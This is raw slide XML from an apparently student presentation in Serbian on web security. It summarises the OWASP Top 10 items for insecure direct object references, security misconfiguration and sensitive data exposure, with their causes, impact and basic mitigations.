              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>preusmeri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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>itd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36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 Object Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>programer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>izloži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unutrašnji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>objekat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što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fajl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, folder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ključ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>baze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Napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lak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je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autorizovan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>korisnik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promeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>parametar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ga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>direktno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referencira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neki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objekat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nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autorizovan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Uticaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>umeren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ovakav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>propust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kompromitovati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>koji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referencirani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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parametara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20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Dobra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>zahteva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sigurnu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>konfiguraciju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aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aplikacione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>servere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>servere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servere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>baze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>podataka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Napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lak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pristupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>računarima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nezakrpljenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>manama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nezaštićenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fajlovima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folderima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prikupio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>znanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sistemu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Uticaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>umeren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>poseduje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pristup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sistemskim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>podacima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>funkcionalnostima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ređe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dešava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>preuzimanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>celog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 od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>napadača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55CAC-4520-4D42-8E94-EAFB0D2AE66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384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3979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54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8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82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8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9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4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99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34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50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E5108-F5B5-466F-9FA9-474F648E774F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23/12/2015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2C6FB-FC05-4888-8D79-F15BF4F56F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14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27221"/>
            <a:ext cx="6922168" cy="1416468"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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958" y="4379495"/>
            <a:ext cx="6176210" cy="1275348"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
              <a:alpha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sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lazar Stefanović 92/13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lazar Krstić 76/13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8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5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="5900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Insecure Direct Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="5900" u="sng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Zamena vrednosti GET parametara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Promena podataka u skrivenim poljima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Pristup podacima bez autorizacije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http://app?file=1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http://app?file=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Report123.xls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algn="just"/>
            <a:endParaRPr lang="sr-Latn-R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8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5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="5900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Insecure Direct Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="5900" u="sng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Pristup podacima </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>po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korisniku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ili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sesiji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indirektnih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referenci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objekte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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>orišćenje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direktne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/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na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objekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mora </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uključiti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/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proveru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prava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pristupa</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-R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39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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Security Misconfiguration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Zastarela verzija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OS, Web/App Server, DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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Omogućene nepotrebne funkcije</a:t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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otvoreni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ovi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lije…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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Potrebna sigurna konfiguracija za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sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplikacije,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sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplikacione servere,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sr-Latn-RS" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> servere </a:t>
            </a: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sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>servere baze podataka.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33878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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Security Misconfiguration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Iterativni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proces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učvršćivanja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preko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koga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lako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brzo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u rad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>može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pustiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> novo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>okruženje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koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pravilno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podešeno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Puštanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u rad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svih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novih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sigurnosnih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zakrpi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kratkom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roku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Periodična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skeniranja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revizije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kako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bi se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pomoglo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otkrivanju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budućih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grešaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>konfiguraciji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ili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zakrpa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nedostaju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04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A6 Sensitive Data Exposure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Ako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neki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podaci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sa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uvani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kao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ist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> text.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Ako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podaci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>š</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alju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kao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ist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> text (bez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enkripcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).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Ako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koriste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zastarele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>probijene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enkripcije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Ako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koriste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slabi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kripto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klju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evi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ili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njihovo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odr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
